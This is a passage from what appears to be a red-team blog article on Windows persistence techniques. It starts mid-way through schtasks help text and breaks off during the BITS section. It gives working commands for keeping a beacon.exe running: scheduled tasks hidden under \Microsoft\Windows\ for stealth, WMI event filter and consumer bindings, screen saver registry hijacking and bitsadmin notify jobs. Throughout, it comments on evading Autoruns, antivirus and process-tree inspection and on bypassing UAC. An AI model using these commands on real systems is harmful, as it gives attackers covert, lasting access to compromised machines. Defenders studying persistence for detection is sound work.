class="kd">the</span> <span class="kd">first</span> <span class="nb">date</span> <span class="na">on</span> <span class="kd">which</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">runs</span>. <span class="kd">Format</span> <span class="kd">yyyy</span><span class="na">/mm/dd</span>. <span class="kd">Defaults</span> <span class="kd">to</span> <span class="kd">the</span> <span class="kd">current</span> <span class="nb">date</span>. <span class="kd">Not</span> <span class="kd">applicable</span> <span class="k">for</span> <span class="kd">ONCE</span><span class="o">,</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span><span class="o">,</span> <span class="kd">ONEVENT</span>. <span class="na">/ED </span><span class="kd">enddate</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">last</span> <span class="nb">date</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">runs</span>. <span class="kd">Format</span> <span class="kd">yyyy</span><span class="na">/mm/dd</span>. <span class="kd">Not</span> <span class="kd">applicable</span> <span class="k">for</span> <span class="kd">ONCE</span><span class="o">,</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONIDLE</span>. <span class="na">/EC </span><span class="kd">ChannelName</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">event</span> <span class="kd">channel</span> <span class="k">for</span> <span class="kd">OnEvent</span> <span class="kd">triggers</span>. <span class="na">/IT </span><span class="kd">Allows</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">to</span> <span class="nb">run</span> <span class="kd">interactively</span> <span class="kd">only</span> <span class="k">if</span> <span class="kd">the</span> <span class="na">/RU </span><span class="kd">user</span> <span class="kd">is</span> <span class="kd">currently</span> <span class="kd">logged</span> <span class="na">on</span>. <span class="kd">This</span> <span class="kd">task</span> <span class="kd">runs</span> <span class="kd">only</span> <span class="kd">when</span> <span class="kd">the</span> <span class="kd">user</span> <span class="kd">is</span> <span class="kd">logged</span> <span class="na">on</span>. <span class="na">/NP </span><span class="kd">No</span> <span class="kd">password</span> <span class="kd">is</span> <span class="kd">stored</span>. <span class="kd">The</span> <span class="kd">task</span> <span class="kd">runs</span> <span class="kd">non</span>‑interactively <span class="kd">as</span> <span class="kd">the</span> <span class="kd">given</span> <span class="kd">user</span>. <span class="kd">Only</span> <span class="kd">local</span> <span class="kd">resources</span> <span class="kd">are</span> <span class="kd">available</span>. <span class="na">/Z </span><span class="kd">Marks</span> <span class="kd">the</span> <span class="kd">task</span> <span class="k">for</span> <span class="kd">deletion</span> <span class="kd">after</span> <span class="kd">its</span> <span class="kd">final</span> <span class="nb">run</span>. <span class="na">/XML </span><span class="kd">xmlfile</span> <span class="kd">Creates</span> <span class="kd">a</span> <span class="kd">task</span> <span class="kd">from</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">XML</span> <span class="kd">specified</span> <span class="k">in</span> <span class="kd">a</span> <span class="kd">file</span>. <span class="kd">Can</span> <span class="kd">be</span> <span class="kd">combined</span> <span class="kd">with</span> <span class="na">/RU </span><span class="kd">and</span> <span class="na">/RP </span><span class="kd">switches</span><span class="o">,</span> <span class="kd">or</span> <span class="na">/RP </span><span class="kd">alone</span> <span class="kd">when</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">XML</span> <span class="kd">already</span> <span class="kd">contains</span> <span class="kd">the</span> <span class="kd">principal</span>. <span class="na">/V</span><span class="m">1</span> <span class="kd">Creates</span> <span class="kd">a</span> <span class="kd">task</span> <span class="kd">visible</span> <span class="kd">to</span> <span class="kd">pre</span>‑Vista <span class="kd">platforms</span>. <span class="kd">Not</span> <span class="kd">compatible</span> <span class="kd">with</span> <span class="na">/XML</span>. <span class="na">/F </span><span class="kd">Forcefully</span> <span class="kd">creates</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">and</span> <span class="kd">suppresses</span> <span class="kd">warnings</span> <span class="k">if</span> <span class="kd">the</span> <span class="kd">specified</span> <span class="kd">task</span> <span class="kd">already</span> <span class="kd">exists</span>. <span class="na">/RL </span><span class="kd">level</span> <span class="kd">Sets</span> <span class="kd">the</span> <span class="nb">run</span> <span class="kd">level</span> <span class="k">for</span> <span class="kd">the</span> <span class="kd">job</span>. <span class="kd">Valid</span> <span class="kd">values</span>: <span class="kd">LIMITED</span> <span class="kd">and</span> <span class="kd">HIGHEST</span>. <span class="kd">Default</span> <span class="kd">is</span> <span class="kd">LIMITED</span>. <span class="na">/DELAY </span><span class="kd">delaytime</span> <span class="kd">Specifies</span> <span class="kd">the</span> <span class="kd">wait</span> <span class="nb">time</span> <span class="kd">to</span> <span class="kd">delay</span> <span class="kd">the</span> <span class="kd">task</span> <span class="kd">after</span> <span class="kd">the</span> <span class="kd">trigger</span> <span class="kd">fires</span>. <span class="kd">Time</span> <span class="nb">format</span> <span class="kd">mmmm</span><span class="nl">:ss</span>. <span class="kd">This</span> <span class="kd">option</span> <span class="kd">is</span> <span class="kd">only</span> <span class="kd">valid</span> <span class="k">for</span> <span class="kd">schedule</span> <span class="kd">types</span> <span class="kd">ONSTART</span><span class="o">,</span> <span class="kd">ONLOGON</span><span class="o">,</span> <span class="kd">ONEVENT</span>. /<span class="o">?</span> <span class="kd">Displays</span> <span class="kd">this</span> <span class="nb">help</span> <span class="kd">message</span>. <span class="kd">Modifiers</span>: <span class="kd">Valid</span> <span class="kd">values</span> <span class="k">for</span> <span class="kd">the</span> <span class="na">/MO </span><span class="kd">switch</span> <span class="kd">per</span> <span class="kd">schedule</span> <span class="nb">type</span>: <span class="kd">MINUTE</span>: <span class="m">1</span> <span class="kd">to</span> <span class="m">1439</span> <span class="kd">minutes</span>. <span class="kd">HOURLY</span>: <span class="m">1</span> – <span class="m">23</span> <span class="kd">hours</span>. <span class="kd">DAILY</span>: <span class="m">1</span> <span class="kd">to</span> <span class="m">365</span> <span class="kd">days</span>. <span class="kd">WEEKLY</span>: <span class="m">1</span> <span class="kd">to</span> <span class="m">52</span> <span class="kd">weeks</span>. <span class="kd">ONCE</span>: <span class="kd">No</span> <span class="kd">modifier</span>. <span class="kd">ONSTART</span>: <span class="kd">No</span> <span class="kd">modifier</span>. <span class="kd">ONLOGON</span>: <span class="kd">No</span> <span class="kd">modifier</span>. <span class="kd">ONIDLE</span>: <span class="kd">No</span> <span class="kd">modifier</span>. <span class="kd">MONTHLY</span>: <span class="m">1</span> <span class="kd">to</span> <span class="m">12</span><span class="o">,</span> <span class="kd">or</span> <span class="kd">FIRST</span><span class="o">,</span> <span class="kd">SECOND</span><span class="o">,</span> <span class="kd">THIRD</span><span class="o">,</span> <span class="kd">FOURTH</span><span class="o">,</span> <span class="kd">LAST</span><span class="o">,</span> <span class="kd">LASTDAY</span>. <span class="kd">ONEVENT</span>: <span class="kd">XPath</span> <span class="kd">event</span> <span class="nb">query</span> <span class="kd">string</span>. <span class="kd">Examples</span>: <span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"doc"</span> <span class="na">on</span> <span class="kd">remote</span> <span class="kd">machine</span> <span class="s2">"ABC"</span> <span class="kd">that</span> <span class="kd">runs</span> <span class="kd">notepad</span><span class="err">.exe</span> <span class="kd">hourly</span> <span class="kd">under</span> <span class="kd">the</span> <span class="s2">"runasuser"</span> <span class="kd">account</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /S </span><span class="kd">ABC</span> <span class="na">/U </span><span class="kd">user</span> <span class="na">/P </span><span class="kd">password</span> <span class="na">/RU </span><span class="kd">runasuser</span> <span class="na">/RP </span><span class="kd">runaspassword</span> <span class="na">/SC </span><span class="kd">HOURLY</span> <span class="na">/TN </span><span class="kd">doc</span> <span class="na">/TR </span><span class="kd">notepad</span> <span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"accountant"</span> <span class="na">on</span> <span class="kd">remote</span> <span class="kd">machine</span> <span class="s2">"ABC"</span> <span class="kd">that</span> <span class="kd">runs</span> <span class="kd">calc</span><span class="err">.exe</span> <span class="kd">every</span> <span class="kd">five</span> <span class="kd">minutes</span> <span class="kd">between</span> <span class="kd">a</span> <span class="nb">start</span> <span class="kd">and</span> <span class="kd">end</span> <span class="nb">time</span> <span class="na">on</span> <span class="kd">specified</span> <span class="kd">dates</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /S </span><span class="kd">ABC</span> <span class="na">/U </span><span class="kd">domain</span>\user <span class="na">/P </span><span class="kd">password</span> <span class="na">/SC </span><span class="kd">MINUTE</span> <span class="na">/MO </span><span class="m">5</span> <span class="na">/TN </span><span class="kd">accountant</span> <span class="na">/TR </span><span class="kd">calc</span><span class="err">.exe</span> <span class="na">/ST </span><span class="m">12</span>:00 <span class="na">/ET </span><span class="m">14</span>:00 <span class="na">/SD </span><span class="m">06</span>/06/2006 <span class="na">/ED </span><span class="m">06</span>/06/2006 <span class="na">/RU </span><span class="kd">runasuser</span> <span class="na">/RP </span><span class="kd">userpassword</span> <span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"gametime"</span> <span class="kd">that</span> <span class="kd">runs</span> <span class="kd">FreeCell</span> <span class="na">on</span> <span class="kd">the</span> <span class="kd">first</span> <span class="kd">Sunday</span> <span class="kd">of</span> <span class="kd">every</span> <span class="kd">month</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /SC </span><span class="kd">MONTHLY</span> <span class="na">/MO </span><span class="kd">first</span> <span class="na">/D </span><span class="kd">SUN</span> <span class="na">/TN </span><span class="kd">gametime</span> <span class="na">/TR </span><span class="kd">c</span>:\windows\system32\freecell <span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"report"</span> <span class="na">on</span> <span class="kd">remote</span> <span class="kd">machine</span> <span class="s2">"ABC"</span> <span class="kd">that</span> <span class="kd">runs</span> <span class="kd">notepad</span><span class="err">.exe</span> <span class="kd">every</span> <span class="kd">week</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /S </span><span class="kd">ABC</span> <span class="na">/U </span><span class="kd">user</span> <span class="na">/P </span><span class="kd">password</span> <span class="na">/RU </span><span class="kd">runasuser</span> <span class="na">/RP </span><span class="kd">runaspassword</span> <span class="na">/SC </span><span class="kd">WEEKLY</span> <span class="na">/TN </span><span class="kd">report</span> <span class="na">/TR </span><span class="kd">notepad</span><span class="err">.exe</span> <span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"logtracker"</span> <span class="na">on</span> <span class="kd">remote</span> <span class="kd">machine</span> <span class="s2">"ABC"</span> <span class="kd">that</span> <span class="kd">runs</span> <span class="kd">notepad</span><span class="err">.exe</span> <span class="kd">every</span> <span class="kd">five</span> <span class="kd">minutes</span> <span class="kd">from</span> <span class="kd">a</span> <span class="kd">specified</span> <span class="nb">start</span> <span class="nb">time</span> <span class="kd">with</span> <span class="kd">no</span> <span class="kd">end</span> <span class="nb">time</span><span class="o">;</span> <span class="kd">password</span> <span class="nb">prompt</span> <span class="k">for</span> <span class="na">/RP</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /S </span><span class="kd">ABC</span> <span class="na">/U </span><span class="kd">domain</span>\user <span class="na">/P </span><span class="kd">password</span> <span class="na">/SC </span><span class="kd">MINUTE</span> <span class="na">/MO </span><span class="m">5</span> <span class="na">/TN </span><span class="kd">logtracker</span> <span class="na">/TR </span><span class="kd">c</span>:\windows\system32\notepad.exe <span class="na">/ST </span><span class="m">18</span>:30 <span class="na">/RU </span><span class="kd">runasuser</span> <span class="na">/RP </span><span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"gaming"</span> <span class="kd">that</span> <span class="kd">runs</span> <span class="kd">freecell</span><span class="err">.exe</span> <span class="kd">daily</span> <span class="kd">from</span> <span class="m">12</span>:00 <span class="kd">to</span> <span class="m">14</span>:00 <span class="kd">and</span> <span class="kd">ends</span> <span class="kd">automatically</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /SC </span><span class="kd">DAILY</span> <span class="na">/TN </span><span class="kd">gaming</span> <span class="na">/TR </span><span class="kd">c</span>:\freecell <span class="na">/ST </span><span class="m">12</span>:00 <span class="na">/ET </span><span class="m">14</span>:00 <span class="na">/K </span><span class="o">==&gt;</span> <span class="kd">Create</span> <span class="kd">a</span> <span class="kd">scheduled</span> <span class="kd">task</span> <span class="s2">"EventLog"</span> <span class="kd">to</span> <span class="nb">start</span> <span class="kd">wevtvwr</span>.msc <span class="kd">whenever</span> <span class="kd">event</span> <span class="m">101</span> <span class="kd">is</span> <span class="kd">published</span> <span class="k">in</span> <span class="kd">the</span> <span class="s2">"System"</span> <span class="kd">channel</span>. <span class="kd">SCHTASKS</span> <span class="na">/Create /TN </span><span class="kd">EventLog</span> <span class="na">/TR </span><span class="kd">wevtvwr</span>.msc <span class="na">/SC </span><span class="kd">ONEVENT</span> <span class="na">/EC </span><span class="kd">System</span> <span class="na">/MO </span><span class="o">*[</span><span class="kd">System</span><span class="na">/EventID</span><span class="o">=</span><span class="m">101</span><span class="o">]</span> <span class="o">==&gt;</span> <span class="kd">File</span> <span class="kd">paths</span> <span class="kd">may</span> <span class="kd">contain</span> <span class="kd">spaces</span><span class="o">;</span> <span class="kd">use</span> <span class="kd">two</span> <span class="kd">sets</span> <span class="kd">of</span> <span class="kd">quotes</span>—one <span class="k">for</span> <span class="kd">CMD</span><span class="err">.EXE</span> <span class="kd">and</span> <span class="kd">one</span> <span class="k">for</span> <span class="kd">SchTasks</span><span class="err">.exe</span>. <span class="kd">The</span> <span class="kd">outer</span> <span class="kd">quotes</span> <span class="k">for</span> <span class="kd">CMD</span> <span class="kd">must</span> <span class="kd">be</span> <span class="kd">double</span> <span class="kd">quotes</span><span class="o">;</span> <span class="kd">inner</span> <span class="kd">quotes</span> <span class="kd">can</span> <span class="kd">be</span> <span class="kd">single</span> <span class="kd">or</span> <span class="kd">escaped</span> <span class="kd">double</span> <span class="kd">quotes</span>: <span class="kd">SCHTASKS</span> <span class="na">/Create /tr </span><span class="s2">"'c:\program files\internet explorer\iexplorer.exe' \"</span><span class="kd">c</span>:\log <span class="kd">data</span>\today.xml\<span class="s2">""</span> ... </code></pre> </div> <p>The "Task Scheduler Library" contains folders. In a pristine Windows installation, there are no scheduled tasks in the root directory, as shown:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Facyvs1577fkm94w3g7jq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Facyvs1577fkm94w3g7jq.png" alt=" " width="800" height="335"></a></p> <p>Naturally, subdirectories are also empty:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hf7pd7efkwh9d4qyd4o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0hf7pd7efkwh9d4qyd4o.png" alt=" " width="800" height="270"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqk2rnx8u8lf253wzvgx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcqk2rnx8u8lf253wzvgx.png" alt=" " width="800" height="347"></a></p> <p>All built‑in tasks reside deep within nested folders. To maintain stealth, it is advisable to adhere to the default Windows convention by creating our own subdirectory and task under <code>\Microsoft\Windows\</code>. Example command:</p> <p><code>SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN \Microsoft\Windows\evil\eviltask /TR C:\Users\hunter\Desktop\evil.exe</code></p> <p>A beacon is received without requiring user logon:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81grdukopp6u725bakfp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81grdukopp6u725bakfp.png" alt=" " width="800" height="402"></a></p> <p>In the process tree, the malicious process is spawned by <code>taskeng.exe</code>, the Task Scheduler engine. Its stealth is inferior to DLL services but superior to auto‑start registry keys.<br><br> However, another significant issue emerges: the <code>SCHTASKS</code> command has incomplete functionality. Many configuration options cannot be manipulated, such as adding multiple triggers simultaneously or modifying settings in the "Conditions" and "Settings" tabs, as shown below:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58afr39kavd2bw64l3jx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58afr39kavd2bw64l3jx.png" alt=" " width="799" height="490"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figyig95qddxmbwd86b1u.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figyig95qddxmbwd86b1u.png" alt=" " width="800" height="670"></a></p> <p>These options remain at their creation defaults, meaning our scheduled task will not start upon wake from sleep, will stop when AC power is disconnected, and will automatically cease after three days. Yet these advanced settings cannot be configured via command line. A search of the Microsoft community yielded the following official response:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fge3acras554txd6iqqqi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fge3acras554txd6iqqqi.png" alt=" " width="798" height="175"></a></p> <p>It is both amusing and frustrating. For normal users, this is unproblematic, but for red teams, manipulating the GUI is inconvenient. While one could craft a DLL module or executable that directly calls the Win32 API to modify these settings, that requires uploading an additional file, reducing efficiency. Therefore, scheduled task persistence can serve only as a fallback measure, not a fully reliable method.<br><br> A somewhat similar vector is Group Policy. Startup scripts can execute cmd or PowerShell scripts to run arbitrary commands, but because the command‑line version of the Group Policy Editor is far too limited, it will not be expanded upon here. (If desktop access is available, configuring a startup script directly via <code>gpedit.msc</code> achieves persistence with relatively high stealth.)</p> <h2> 0x05 WMI </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction.<br><br> WMI can be regarded as a set of APIs that interact directly with the Windows operating system. Being a native tool that requires no installation, it is also a valuable aid for persistence.<br><br> Because WMI events execute in a loop, to avoid spawning countless shells, one can restrict execution using the system uptime (as long as the trigger delay falls within the specified window; some machines boot slowly, so the start time should be set higher). Example commands:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">wmic</span> <span class="na">/NAMESPACE</span>:<span class="s2">"\\root\subscription"</span> <span class="kd">PATH</span> __EventFilter <span class="kd">CREATE</span> <span class="kd">Name</span><span class="o">=</span><span class="s2">"evil"</span><span class="o">,</span> <span class="kd">EventNameSpace</span><span class="o">=</span><span class="s2">"root\cimv2"</span><span class="o">,</span><span class="kd">QueryLanguage</span><span class="o">=</span><span class="s2">"WQL"</span><span class="o">,</span> <span class="kd">Query</span><span class="o">=</span><span class="s2">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime &gt;= 240 AND TargetInstance.SystemUpTime &lt; 310"</span> <span class="nb">wmic</span> <span class="na">/NAMESPACE</span>:<span class="s2">"\\root\subscription"</span> <span class="kd">PATH</span> <span class="kd">CommandLineEventConsumer</span> <span class="kd">CREATE</span> <span class="kd">Name</span><span class="o">=</span><span class="s2">"evilConsumer"</span><span class="o">,</span> <span class="kd">ExecutablePath</span><span class="o">=</span><span class="s2">"C:\Users\hunter\Desktop\beacon.exe"</span><span class="o">,</span><span class="kd">CommandLineTemplate</span><span class="o">=</span><span class="s2">"C:\Users\hunter\Desktop\beacon.exe"</span> <span class="nb">wmic</span> <span class="na">/NAMESPACE</span>:<span class="s2">"\\root\subscription"</span> <span class="kd">PATH</span> __FilterToConsumerBinding <span class="kd">CREATE</span> <span class="kd">Filter</span><span class="o">=</span><span class="s2">"__EventFilter.Name=\"</span><span class="kd">evil</span>\<span class="s2">""</span><span class="o">,</span> <span class="kd">Consumer</span><span class="o">=</span><span class="s2">"CommandLineEventConsumer.Name=\"</span><span class="kd">evilConsumer</span>\<span class="s2">""</span> </code></pre> </div> <p>Due to possible variations in the exact timing window, multiple beacons may appear in certain circumstances:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgq6a0v11c2b17m55u3x2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgq6a0v11c2b17m55u3x2.png" alt=" " width="800" height="82"></a></p> <p>Inspecting the process tree reveals moderate stealth:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcymgee1zn4x8btj12747.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcymgee1zn4x8btj12747.png" alt=" " width="800" height="267"></a></p> <h2> 0x06 Screen Saver </h2> <p><strong>Required Privileges:</strong> Standard user.<br><br> Although not all users employ a screen saver, the relevant configuration is conveniently stored in the registry, as shown in the four keys below:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26lbjqtf5ihuooi1s4yo.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26lbjqtf5ihuooi1s4yo.png" alt=" " width="729" height="249"></a></p> <p>Full paths:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecure HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE </code></pre> </div> <p>Write directly to the registry:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"hkcu\control panel\desktop"</span> <span class="na">/v </span><span class="kd">SCRNSAVE</span><span class="err">.EXE</span> <span class="na">/d </span><span class="kd">C</span>:\Users\hunter\Desktop\beacon.exe <span class="na">/f </span><span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"hkcu\control panel\desktop"</span> <span class="na">/v </span><span class="kd">ScreenSaveActive</span> <span class="na">/d </span><span class="m">1</span> <span class="na">/f </span><span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"hkcu\control panel\desktop"</span> <span class="na">/v </span><span class="kd">ScreenSaverIsSecure</span> <span class="na">/d </span><span class="m">0</span> <span class="na">/f </span><span class="nb">reg</span> <span class="kd">add</span> <span class="s2">"hkcu\control panel\desktop"</span> <span class="na">/v </span><span class="kd">ScreenSaveTimeOut</span> <span class="na">/d </span><span class="m">60</span> <span class="na">/f </span></code></pre> </div> <p>Examining the process tree shows it is spawned by <code>winlogon.exe</code> – stealth is moderate:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3mllhapjx2x7yrdpnpvk.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3mllhapjx2x7yrdpnpvk.png" alt=" " width="181" height="88"></a></p> <p>A minor pitfall: if a screen saver has never been configured, all keys except <code>ScreenSaveActive</code> (which defaults to 1) do not exist. Proper screen saver operation requires all keys to hold data; therefore, all four must be rewritten. Additionally, testing shows the shortest trigger time is 60 seconds – even if a smaller value is set, the programme still executes after 60 seconds.<br><br> Naturally, as indicated by the registry path, this method yields a shell with only current‑user privileges. Its advantage is that it does not require elevation.</p> <h2> 0x07 Background Intelligent Transfer Service (BITS) </h2> <p><strong>Required Privileges:</strong> Administrator rights (UAC bypass allowed).<br><br> The Background Intelligent Transfer Service (BITS) facilitates the transfer of large amounts of data without degrading network performance. It accomplishes this by transferring data in small blocks, utilising available idle bandwidth, and reassembling the data at the destination. BITS is supported on Microsoft® Windows Server 2003 family operating systems and Microsoft® Windows 2000. (Source: Baidu Baike)<br><br> Many online "penetration testing tutorials" include using the <code>bitsadmin</code> command to download files or execute commands, but it can also be employed for persistence and can evade detection by Autoruns and anti‑virus protection against auto‑start command execution.<br><br> Adding a task is straightforward, requiring only four commands:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">bitsadmin</span> <span class="na">/create </span><span class="kd">evil</span> <span class="nb">bitsadmin</span> <span class="na">/addfile </span><span class="kd">evil</span> <span class="s2">"C:\Users\hunter\Desktop\beacon.exe"</span> <span class="s2">"C:\Users\hunter\Desktop\beacon.exe"</span> <span class="nb">bitsadmin.exe</span> <span class="na">/SetNotifyCmdLine </span><span class="kd">evil</span> <span class="s2">"C:\Users\hunter\Desktop\beacon.exe"</span> <span class="kd">NUL</span> <span class="nb">bitsadmin</span> <span class="na">/Resume </span><span class="kd">evil</span> </code></pre> </div> <p>One advantage is that it can be executed within a reduced administrator session (bypassing UAC), and naturally the resulting beacon also operates with reduced privileges:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnce9081cdaaq6vmiuu7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnce9081cdaaq6vmiuu7.png" alt=" " width="800" height="114"></a></p> <p>After a reboot, since the task has not been completed, the system will re‑launch it, thus achieving persistence. Although BITS tasks have a default lifetime of 90 days—after which they are automatically cancelled—this is sufficient for red team operations:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsbg4z8sv3yrgky3dcqt3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsbg4z8sv3yrgky3dcqt3.png" alt=" " width="800" height="678"></a></p> <p>Inspecting the process tree, it is launched by <code>svchost.exe -k netsvcs</code>. However, because it remains an independent process, stealth is moderate:</p> <p><a 